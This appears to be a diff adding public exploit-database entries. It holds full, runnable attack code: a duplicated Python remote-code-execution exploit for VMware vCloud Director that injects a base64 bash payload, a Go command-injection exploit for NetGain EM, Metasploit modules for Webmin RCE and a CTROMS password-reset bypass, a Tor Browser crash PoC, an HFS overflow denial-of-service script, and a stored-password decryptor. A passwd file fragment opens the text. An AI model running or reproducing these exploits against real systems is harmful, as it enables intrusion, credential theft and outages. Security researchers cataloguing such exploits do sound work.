news:*:10:12:news:/var/spool/news:/bin/sh
uucp:*:11:13:uucp:/var/spool/uucp:/bin/sh
operator:*:12:0:operator:/root:/bin/sh
games:*:13:60:games:/usr/games:/bin/sh
ftp:*:15:14:ftp:/var/ftp:/bin/sh
man:*:16:20:man:/var/cache/man:/bin/sh
www:*:17:18:www-data:/var/www:/bin/sh
sshd:*:18:19:sshd:/var/run/sshd:/bin/sh
proxy:*:19:21:proxy:/bin:/bin/sh
telnetd:*:20:22:proxy:/bin:/bin/sh
backup:*:34:34:backup:/var/backups:/bin/sh
ais:*:101:101:ais:/var/run/ais:/bin/sh
nobody:*:65534:65534:nobody:/nonexistent:/bin/sh

3670
exploits/hardware/webapps/48588.py Executable file
View file

File diff suppressed because it is too large Load diff

18
exploits/ios/local/47409.txt Normal file
View file

@ -0,0 +1,18 @@
Exploit Title: SockPuppet 3
Date: September 8, 2019
Exploit Author: Umang Raghuvanshi
Vendor Homepage: https://apple.com
Software Link: https://ipsw.me/
Version: iOS 11.0—12.2, iOS 12.4
Tested on: iOS 11.0—12.2, iOS 12.4
CVE: CVE-2019-8605
This is an alternative (and complete) exploit for CVE-2019-8605. I have only implemented the exploit and do not claim any rights for discovering and/or publishing the vulnerability. The actual exploit code is in “SockPuppet3.cpp”, other files are either helpers or documentation. This exploit [1] has already been verified in production several times [2] [3], however, I can assist in additional verification if required.
POC:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47409.zip
[1] https://gist.github.com/ur0/a9b2d8088479a70665f729c4e9bf8720
[2] https://twitter.com/Pwn20wnd/status/1163392040073191426
[3] https://twitter.com/electra_team/status/1163658714840047618

138
exploits/java/webapps/48549.py Executable file
View file

@ -0,0 +1,138 @@
# Exploit Title: VMWAre vCloud Director 9.7.0.15498291 - Remote Code Execution
# Exploit Author: Tomas Melicher
# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
# Date: 2020-05-24
# Vendor Homepage: https://www.vmware.com/
# Software Link: https://www.vmware.com/products/cloud-director.html
# Tested On: vCloud Director 9.7.0.15498291
# Vulnerability Description:
# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.
#!/usr/bin/python
import argparse # pip install argparse
import base64, os, re, requests, sys
if sys.version_info >= (3, 0):
from urllib.parse import urlparse
else:
from urlparse import urlparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}"
session = requests.Session()
def login(url, username, password, verbose):
target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)
res = session.get(target_url)
match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE)
if match:
tenant = match.group(1)
else:
print('[!] can\'t find tenant identifier')
return
if verbose:
print('[*] tenant: %s'%(tenant))
match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE)
if match: # Cloud Director 9.*
login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))
res = session.post(login_url, data={'username':username,'password':password})
if res.status_code == 401:
print('[!] invalid credentials')
return
else: # Cloud Director 10.*
match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)
if match:
login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))
headers = {
'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))),
'Accept': 'application/json;version=29.0',
'Content-type': 'application/json;version=29.0'
}
res = session.post(login_url, headers=headers)
if res.status_code == 401:
print('[!] invalid credentials')
return
else:
print('[!] url for login form was not found')
return
cookies = session.cookies.get_dict()
jwt = cookies['vcloud_jwt']
session_id = cookies['vcloud_session_id']
if verbose:
print('[*] jwt token: %s'%(jwt))
print('[*] session_id: %s'%(session_id))
res = session.get(target_url)
match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE)
if match is None:
print('[!] organization not found')
return
organization = match.group(1)
if verbose:
print('[*] organization name: %s'%(organization))
match = re.search(r'orgId : \'([^\']+)', res.content)
if match is None:
print('[!] orgId not found')
return
org_id = match.group(1)
if verbose:
print('[*] organization identifier: %s'%(org_id))
return (jwt,session_id,organization,org_id)
def exploit(url, username, password, command, verbose):
(jwt,session_id,organization,org_id) = login(url, username, password, verbose)
headers = {
'Accept': 'application/*+xml;version=29.0',
'Authorization': 'Bearer %s'%jwt,
'x-vcloud-authorization': session_id
}
admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)
res = session.get(admin_url, headers=headers)
match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE)
if match:
version = match.group(1)
if verbose:
print('[*] detected version of Cloud Director: %s'%(version))
else:
version = None
print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0')
email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)
payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command))
data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>'
data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>'
data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>'
data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload)
data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>'
res = session.put(email_settings_url, data=data, headers=headers)
match = re.search(r'value:\s*\[([^\]]+)\]', res.content)
if verbose:
print('')
try:
print(base64.b64decode(match.group(1)))
except Exception:
print(res.content)
parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')
parser.add_argument('-v', action='store_true')
parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)
parser.add_argument('-u', metavar='username', required=True)
parser.add_argument('-p', metavar='password', required=True)
parser.add_argument('-c', metavar='command', help='command to execute', default='id')
args = parser.parse_args()
url = urlparse(args.t)
exploit(url, args.u, args.p, args.c, args.v)

71
exploits/jsp/webapps/47391.go Executable file
View file

@ -0,0 +1,71 @@
/********************************************************************************
# Exploit Title: NetGain EM Plus <= v10.1.68 - Unauthorized Local File Inclusion
# Date: 15 September 2019
# Exploit Author: azams / @TheRealAzams
# Vendor Homepage: http://netgain-systems.com
# Software Link: http://www.netgain-systems.com/free/
# Version: v10.1.68
# Tested on: Linux
#
# Install golang: https://golang.org/doc/install
# Compile exploit: go build exploit.go
# Run exploit without compiling: go run exploit.go
# Shouts: Rix, Channisa, Ridho7ul & Horangi!
*********************************************************************************/
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"strings"
)
var (
target string
port string
cmd string
)
func main() {
for i := range os.Args {
if os.Args[i] == "-u" {
target = os.Args[i+1]
} else if os.Args[i] == "-p" {
port = os.Args[i+1]
} else if os.Args[i] == "-cmd" {
cmd = os.Args[i+1]
}
}
if target != "" || port != "" || cmd != "" {
cmd = "type=sh&content=%232Fbin%2Fsh%0Aecho+'0xdeadnoob'%0a" + cmd + "%0aecho+'0xdeadnoob'&args=&count=0&ip=localhost"
status, body := exploit()
if strings.Contains(status, "200") {
fmt.Println("Status Code: " + status)
result := strings.Split(body, "0xdeadnoob")
fmt.Println("Result: \n" + strings.Trim(result[1], "\n"))
return
}
fmt.Println("Exploit failed!")
} else {
fmt.Println("Usage: ./exploit -u http://127.0.0.1 -p 8181 -cmd 'id;'")
}
}
func exploit() (string, string) {
tbTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}}
client := &http.Client{Transport: tbTransport}
datas, err := url.ParseQuery(cmd)
req, err := http.NewRequest("POST", target+":"+port+"/u/jsp/designer/script_test.jsp", strings.NewReader(datas.Encode()))
req.Header.Set("Content-type", "application/x-www-form-urlencoded")
resp, err := client.Do(req)
if err != nil {
panic(err)
}
defer resp.Body.Close()
body, _ := ioutil.ReadAll(resp.Body)
return resp.Status, string(body)
}

30
exploits/linux/dos/44994.html Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Tor Browser - Use After Free (PoC)
# Date: 09.07.2018
# Exploit Author: t4rkd3vilz
# Vendor Homepage: https://www.torproject.org/
# Software Link: https://www.torproject.org/download/download-easy.html.en
# Version: Tor 0.3.2.x before 0.3.2.10
# Tested on: Kali Linux
# CVE : CVE-2018-0491
#Run exploit, result DOS
<!DOCTYPE html>
<html>
<title>veryhandsome jameel naboo</title>
<body>
<script>
function send()
{
try { document.body.contentEditable = 'true'; } catch(e){}
try { var e0 = document.createElement("frameset"); } catch(e){}
try { document.body.appendChild(e0); } catch(e){}
try { e0.appendChild(document.createElement("BBBBBBBBBBBBBBB")); } catch(e){}
try {
e0.addEventListener("DOMAttrModified",function(){document.execCommand("SelectAll");e0['bo
rder']='-4400000000';}, false); e0.focus();} catch(e){}
try { e0.setAttribute('iframe'); } catch(e){}
try { document.body.insertBefore(e0); } catch(e){}
}
send();</script></html>

131
exploits/linux/remote/48196.txt Normal file
View file

@ -0,0 +1,131 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CTROMS Terminal OS - Port Portal "Password Reset" Authentication Bypass' ,
'Description' => %q{
This module exploits an authentication bypass in CTROMS, triggered by password reset verification code disclosure.
In order to exploit this vulnerability, the username must be known.
Exploiting this vulnerability create a new password for the user you specified and present it to you.
The "verification code" and "cookie generate" functions required to reset the password contain vulnerability.
When the "userId" parameter is posted to "getverificationcode.jsp", a verification code is transmitted to the account's phone number for password reset.
But this verification code written in the database is also reflected in the response of the request.
The first vector would be to use this verification code.
The second vector is the "rand" cookie values returned in this request. These values are md5.
If these values are assigned in the response, password reset can be done via these cookie values.
Ex: [ Cookie: 6fb36ecf2a04b8550ba95603047fe85=fae0bKBGtKBKtKh.wKA.vLBmuLxmuM.; 34d1c350632806406ecc517050da0=b741baa96686a91d4461145e40a9c2df ]
},
'References' =>
[
[ 'CVE', '' ],
[ 'URL', 'https://www.pentest.com.tr/exploits/CTROMS-Terminal-OS-Port-Portal-Password-Reset-Authentication-Bypass.html' ],
[ 'URL', 'https://www.globalservices.bt.com' ]
],
'Author' =>
[
'Özkan Mustafa AKKUŞ <AkkuS>' # Discovery & PoC & MSF Module @ehakkus
],
'License' => MSF_LICENSE,
'DisclosureDate' => "March 2 2020",
'DefaultOptions' => { 'SSL' => true }
))
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'Username']),
OptString.new('PASSWORD', [true, 'Password for the reset', Rex::Text.rand_text_alphanumeric(12)])
])
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def check
begin
res = send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'),
'headers' =>
{
'Referer' => "#{peer}/verification.jsp"
},
'data' => "userId=#{Rex::Text.rand_text_alphanumeric(8)}"
})
rescue
return Exploit::CheckCode::Unknown
end
if res.code == 200 and res.body.include? '"rand"'
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
end
def run
unless Exploit::CheckCode::Appears == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
res = send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'getuserinfo.jsp'),
'headers' =>
{
'Referer' => "#{peer}/verification.jsp"
},
'data' => "userId=#{datastore["USERNAME"]}"
})
if res.code == 200 and res.body.include? '"mobileMask"'
print_good("Excellent! password resettable for #{datastore["USERNAME"]}")
else
fail_with(Failure::NotVulnerable, 'The user you specified is not valid')
end
begin
res = send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'),
'headers' =>
{
'Referer' => "#{peer}/verification.jsp"
},
'data' => "userId=#{datastore["USERNAME"]}"
})
@cookie = res.get_cookies
res = send_request_cgi({
'method' => 'POST',
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'getresult.jsp'),
'cookie' => @cookie,
'headers' =>
{
'Referer' => "#{peer}/verification.jsp"
},
'data' => "userId=#{datastore["USERNAME"]}&password=#{datastore["PASSWORD"]}"
})
if res.body.include? 'result":10'
print_good("boom! Password successfully reseted.")
print_good("Username : #{datastore["USERNAME"]}")
print_good("Password : #{datastore["PASSWORD"]}")
else
fail_with(Failure::BadConfig, "Unknown error while resetting the password. Response: #{res.code}")
end
end
end
end

139
exploits/linux/remote/48540.py Executable file
View file

@ -0,0 +1,139 @@
#!/usr/bin/python
# Exploit Title: vCloud Director - Remote Code Execution
# Exploit Author: Tomas Melicher
# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/
# Date: 2020-05-24
# Vendor Homepage: https://www.vmware.com/
# Software Link: https://www.vmware.com/products/cloud-director.html
# Tested On: vCloud Director 9.7.0.15498291
# Vulnerability Description:
# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name.
import argparse # pip install argparse
import base64, os, re, requests, sys
if sys.version_info >= (3, 0):
from urllib.parse import urlparse
else:
from urlparse import urlparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}"
session = requests.Session()
def login(url, username, password, verbose):
target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path)
res = session.get(target_url)
match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE)
if match:
tenant = match.group(1)
else:
print('[!] can\'t find tenant identifier')
return (None,None,None,None)
if verbose:
print('[*] tenant: %s'%(tenant))
match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE)
if match: # Cloud Director 9.*
login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0))
res = session.post(login_url, data={'username':username,'password':password})
if res.status_code == 401:
print('[!] invalid credentials')
return (None,None,None,None)
else: # Cloud Director 10.*
match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE)
if match:
login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0))
headers = {
'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))),
'Accept': 'application/json;version=29.0',
'Content-type': 'application/json;version=29.0'
}
res = session.post(login_url, headers=headers)
if res.status_code == 401:
print('[!] invalid credentials')
return (None,None,None,None)
else:
print('[!] url for login form was not found')
return (None,None,None,None)
cookies = session.cookies.get_dict()
jwt = cookies['vcloud_jwt']
session_id = cookies['vcloud_session_id']
if verbose:
print('[*] jwt token: %s'%(jwt))
print('[*] session_id: %s'%(session_id))
res = session.get(target_url)
match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE)
if match is None:
print('[!] organization not found')
return (None,None,None,None)
organization = match.group(1)
if verbose:
print('[*] organization name: %s'%(organization))
match = re.search(r'orgId : \'([^\']+)', res.content)
if match is None:
print('[!] orgId not found')
return (None,None,None,None)
org_id = match.group(1)
if verbose:
print('[*] organization identifier: %s'%(org_id))
return (jwt,session_id,organization,org_id)
def exploit(url, username, password, command, verbose):
(jwt,session_id,organization,org_id) = login(url, username, password, verbose)
if jwt is None:
return
headers = {
'Accept': 'application/*+xml;version=29.0',
'Authorization': 'Bearer %s'%jwt,
'x-vcloud-authorization': session_id
}
admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc)
res = session.get(admin_url, headers=headers)
match = re.search(r'<description>\s*([^<\s]+)', res.content, re.IGNORECASE)
if match:
version = match.group(1)
if verbose:
print('[*] detected version of Cloud Director: %s'%(version))
else:
version = None
print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0')
email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id)
payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command))
data = '<root:OrgEmailSettings xmlns:root="http://www.vmware.com/vcloud/v1.5"><root:IsDefaultSmtpServer>false</root:IsDefaultSmtpServer>'
data += '<root:IsDefaultOrgEmail>true</root:IsDefaultOrgEmail><root:FromEmailAddress/><root:DefaultSubjectPrefix/>'
data += '<root:IsAlertEmailToAllAdmins>true</root:IsAlertEmailToAllAdmins><root:AlertEmailTo/><root:SmtpServerSettings>'
data += '<root:IsUseAuthentication>false</root:IsUseAuthentication><root:Host>%s</root:Host><root:Port>25</root:Port>'%(payload)
data += '<root:Username/><root:Password/></root:SmtpServerSettings></root:OrgEmailSettings>'
res = session.put(email_settings_url, data=data, headers=headers)
match = re.search(r'value:\s*\[([^\]]+)\]', res.content)
if verbose:
print('')
try:
print(base64.b64decode(match.group(1)))
except Exception:
print(res.content)
parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]')
parser.add_argument('-v', action='store_true')
parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True)
parser.add_argument('-u', metavar='username', required=True)
parser.add_argument('-p', metavar='password', required=True)
parser.add_argument('-c', metavar='command', help='command to execute', default='id')
args = parser.parse_args()
url = urlparse(args.t)
exploit(url, args.u, args.p, args.c, args.v)

170
exploits/linux/webapps/47330.rb Executable file
View file

@ -0,0 +1,170 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Webmin < 1.930 Remote Code Execution",
'Description' => %q{
This exploit takes advantage of a code execution issue within the function
unserialise_variable() located in web-lib-funcs.pl, in order to gain root.
The only prerequisite is a valid session id.
},
'License' => MSF_LICENSE,
'Author' =>
[
'James Bercegay', # Vulnerability Discovery
],
'References' =>
[
[ 'URL', 'https://www.gulftech.org/' ]
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Targets' => [ ['Automatic', {}] ],
'DisclosureDate' => '2019/08/30',
'DefaultTarget' => 0))
register_options(
[
OptString.new('WMPORT', [ true, "Webmin port", '10000']),
OptString.new('WMUSER', [ true, "Webmin username", 'test']),
OptString.new('WMPASS', [ true, "Webmin password", 'test']),
])
end
def check
# Set Webmin port
datastore['RPORT'] = datastore['WMPORT']
# Verbose
print_status("Attempting to login")
# Send login request
res = send_request_cgi(
{
'uri' => '/session_login.cgi',
'method' => 'POST',
'vars_post' =>
{
'user' => datastore['WMUSER'],
'pass' => datastore['WMPASS'],
'save' => '1'
},
'cookie' => "redirect=1; testing=1; sessiontest=1;"
})
# If succesful cookie will be set
if ( res and res.headers['Set-Cookie'] )
# Do we have a valid SID?
if ( /sid=/.match(res.headers['Set-Cookie']) )
# Extract the SID
sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
print_good("Login was successful")
else
# No dice
print_bad("Unable to login")
return Exploit::CheckCode::Safe
end
else
# No dice
print_bad("Unexpected response")
return Exploit::CheckCode::Safe
end
# Verbose
print_status("Checking if host is vulnerable")
# Try to execute arbitrary code
res = send_request_cgi({
'uri' => '/rpc.cgi',
'method' => 'POST',
'headers' =>
{
'Referer' => 'http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s
},
'data' => 'OBJECT CGI;print "Content-Type: text/metasploit\n\n"',
'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid
})
# If it works our custom Content-Type will be set
if ( res.headers['Content-Type'] and res.headers['Content-Type'] == "text/metasploit" )
# Good
return Exploit::CheckCode::Vulnerable
else
# Bad
return Exploit::CheckCode::Safe
end
end
def exploit
# Set Webmin port
datastore['RPORT'] = datastore['WMPORT']
# Verbose
print_status("Attempting to login")
# Send login request
res = send_request_cgi(
{
'uri' => '/session_login.cgi',
'method' => 'POST',
'vars_post' =>
{
'user' => datastore['WMUSER'],
'pass' => datastore['WMPASS'],
'save' => '1'
},
'cookie' => "redirect=1; testing=1; sessiontest=1;"
})
# If succesful cookie will be set
if ( res and res.headers['Set-Cookie'] )
# Do we have a valid SID?
if ( /sid=/.match(res.headers['Set-Cookie']) )
# Extract the SID
sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
print_good("Login was successful")
else
# No dice
print_bad("Unable to login")
return
end
else
# No dice
print_bad("Unexpected response")
return
end
# Verbose
print_status("Sending selected payload")
# Hex encode payload to prevent problems with the payload getting mangled
hex = '\x' + payload.encoded.scan(/./).map{ |x| x.unpack('H*') }.join('\x')
# Send selected payload
res = send_request_cgi({
'uri' => '/rpc.cgi',
'method' => 'POST',
'headers' =>
{
'Referer' => 'https://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s
},
'data' => 'OBJECT CGI;`' + hex + '`',
'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid
})
end
end

192
exploits/multiple/remote/48569.py Executable file
View file

@ -0,0 +1,192 @@
# Exploit Title: HFS Http File Server 2.3m Build 300 - Buffer Overflow (PoC)
# Date: 2020-06-05
# Exploit Author: hyp3rlinx
# Vendor Homepage: www.rejetto.com
# CVE : CVE-2020-13432
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/HFS-HTTP-FILE-SERVER-v2.3-REMOTE-BUFFER-OVERFLOW-DoS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.rejetto.com
[Product]
HFS Http File Server v2.3m Build 300
[Vulnerability Type]
Remote Buffer Overflow (DoS)
[CVE Reference]
CVE-2020-13432
[Security Issue]
rejetto HFS (aka HTTP File Server) v2.3m Build #300, when virtual
files or folders are used, allows remote attackers to trigger an
invalid-pointer write access violation via concurrent HTTP requests
with a long URI or long HTTP headers like Cookie, User-Agent etc.
Remote unauthenticated attackers can send concurrent HTTP requests
using an incrementing or specific payload range of junk characters for
values in the URL parameters or HTTP headers sent to the server. This
results in hfs.exe server crash from an invalid pointer write access
violation.
Requirements:
hfs.exe must have at least one saved virtual file or folder present.
Test using a remote IP and NOT from the same machine (localhost).
Dump...
(e4c.3a8): Access violation - code c0000005 (first/second chance not available)
For analysis of this file, run !analyze -v
WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
eax=000a1390 ebx=000a138c ecx=006eb188 edx=001b0000 esi=00000000 edi=00000002
eip=777ef8b4 esp=000a0e0c ebp=000a12cc iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210206
ntdll!RtlpResolveAssemblyStorageMapEntry+0x18:
777ef8b4 53 push ebx
0:000> !load winext/msec
0:000> !exploitable
WARNING: Stack overflow detected. The unwound frames are extracted from outside normal stack bounds.
*** WARNING: Unable to verify checksum for hfs.exe
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlpResolveAssemblyStorageMapEntry+0x0000000000000018 (Hash=0x7a29717c.0x325e6a71)
PROCESS_NAME: hfs.exe
FOLLOWUP_IP:
hfs+8fad7
0048fad7 8945f0 mov dword ptr [ebp-10h],eax
WRITE_ADDRESS: 000a0e08
[References]
https://github.com/rejetto/hfs2/releases/tag/v2.4-rc01
[Exploit/POC]
from socket import *
import time,sys
#HFS HTTP File Server v2.3m build 300.
#Vendor: www.rejetto.com
#Remote Remote Buffer Overflow DoS
#Note: hfs.exe must have at least one saved virtual file or folder on the target
#test using a remote IP and not from the same machine.
#Discovery: hyp3rlinx
#hyp3rlinx.altervista.org
#ISR: ApparitionSec
#=========================================================================
res=""
once=0
cnt=0
max_requests=1666
def hfs_dos():
global ip,port,length,res,once,cnt,max_requests
cnt+=1
length += 1
payload = "A"*length
try:
s=socket(AF_INET, SOCK_STREAM)
s.settimeout(2)
s.connect((ip,port))
##bof ="HEAD / HTTP/1.1\r\nHost: "+ip+"Cookie: "+payload+"\r\n\r\n"
bof ="HEAD /?mode="+payload+" HTTP/1.1\r\nHost: "+ip+"\r\n\r\n"
s.send(bof.encode("utf-8"))
if once==0:
once+=1
res = s.recv(128)
if res != "":
print("Targets up please wait...")
if "HFS 2.3m" not in str(res):
print("[!] Non vulnerable HFS version, exiting :(")
exit()
except Exception as e:
if e != None:
if str(e).find("timed out")!=-1:
if res=="":
print("[!] Target is not up or behind a firewall? :(")
exit()
else:
print("[!] Done!")
exit()
s.close()
if cnt == max_requests:
return False
return True
def msg():
print("HFS HTTP File Server v2.3m build 300.")
print("Unauthenticated Remote Buffer Overflow (DoS - PoC)")
print("Virtual HFS saved file or folder required.")
print("Run from a different machine (IP) than the target.")
print("By Hyp3rlinx - ApparitionSec\n")
if __name__=="__main__":
length=3
if len(sys.argv) != 3:
msg()
print("Usage: <hfs.exe Server>, <Port (usually 8080)>")
exit()
ip = sys.argv[1]
port = int(sys.argv[2])
msg()
while True:
if not hfs_dos():
print("[!] Failed, non vuln version or no virtual files exist :(")
break
[POC Video URL]
https://www.youtube.com/watch?v=qQ-EawfXuWY
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: May 18, 2020
Vendor reply: May 18, 2020
Vendor confirm vulnerability: May 19, 2020
Vendor creates fix: May 20, 2020
Vendor released new version 2.4 : June 7, 2020
June 8, 2020 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

37
exploits/multiple/remote/48587.py Executable file
View file

@ -0,0 +1,37 @@
# Exploit Title: SOS JobScheduler 1.13.3 - Stored Password Decryption
# Google Dork: N/A
# Date: 2020-04-20
# Exploit Author: Sander Ubink
# Vendor Homepage: www.sos-berlin.com
# Software Link: www.sos-berlin.com/en/jobscheduler-downloads
# Version: Tested on 1.12.9 and 1.13.3, vendor reported 1.12 and 1.13
# Tested on: Windows and Linux
# CVE: CVE-2020-12712
# Description: SOS JobScheduler is a tool for remote system administration that allows users to call maintenance scripts via a web interface.
# The tool places the maintenance scripts on the remote systems by means of (S)FTP. It allows the user to save profiles for these connections,
# in which the password for the (S)FTP connection is optionally stored. When the user chooses to store the password with the profile,
# it is encrypted using the name of the profile as the encryption key. Since the name of the profile is stored in the same configuration file,
# the plaintext (S)FTP password can trivially be recovered. The encryption algorithm used is Triple DES (3DES) with three keys, requiring a key
# length of 24 bytes. The profile name is padded to this length to create the key. Finally, the encrypted password gets base64 encoded before
# being stored in the configuration file.
# Usage: python jobscheduler-decrypt.py [encrypted password in base64] [profile name]
import pyDes
import base64
import argparse
parser = argparse.ArgumentParser(description="Decrypt the password stored in a Jobscheduler (S)FTP profile configuration file")
parser.add_argument("password", help="password to be decrypted")
parser.add_argument("profilename", help="name of the profile")
args = parser.parse_args()
if len(args.profilename) > 24:
sys.exit("Profile name is longer than 24 characters. Check the validity of the input.")
key = args.profilename + ((24 - len(args.profilename)) * " ")
cipher = pyDes.triple_des(key, pyDes.ECB, b"\0\0\0\0\0\0\0\0", pad=" ", padmode=None)
plain = cipher.decrypt(base64.b64decode(args.password))
print(plain)

233
exploits/multiple/webapps/47342.html Normal file
View file

@ -0,0 +1,233 @@
Hello,
Please find the below vulnerability details,
---------------------------------------------------------------------------------------------------------------------------------
# Exploit Title: Wolters Kluwer TeamMate+ Cross-Site Request Forgery
(CSRF) vulnerability
# Date: 02/09/2019
# Exploit Author: Bhadresh Patel
# Version: <= TeamMate Version 3.1 (January 2019) (Internal Version:21.0.0.0)
# CVE : CVE-2019-10253
This is an article with PoC exploit code for for Wolters Kluwer TeamMate+
Cross-Site Request Forgery (CSRF) vulnerability
---------------------------------------------------------------------------------------------------------------------------------
Title:
====
Wolters Kluwer TeamMate+ Cross-Site Request Forgery (CSRF) vulnerability
CVE:
====
CVE-2019-10253
Date:
====
02/09/2019 (dd/mm/yyyy)
Vendor:
======
Wolters Kluwer is a global leader in professional information, software
solutions, and services for the health, tax & accounting, finance, risk &
compliance, and legal sectors. We help our customers make critical
decisions every day by providing expert solutions that combine deep domain
knowledge with specialized technology and services.
Vendor link: http://www.teammatesolutions.com/about-us.aspx
Vulnerable Product:
==============
TeamMate+
TeamMate Global Audit Solutions, part of the Tax and Accounting Division of
Wolters Kluwer, helps professionals in all industries at organizations
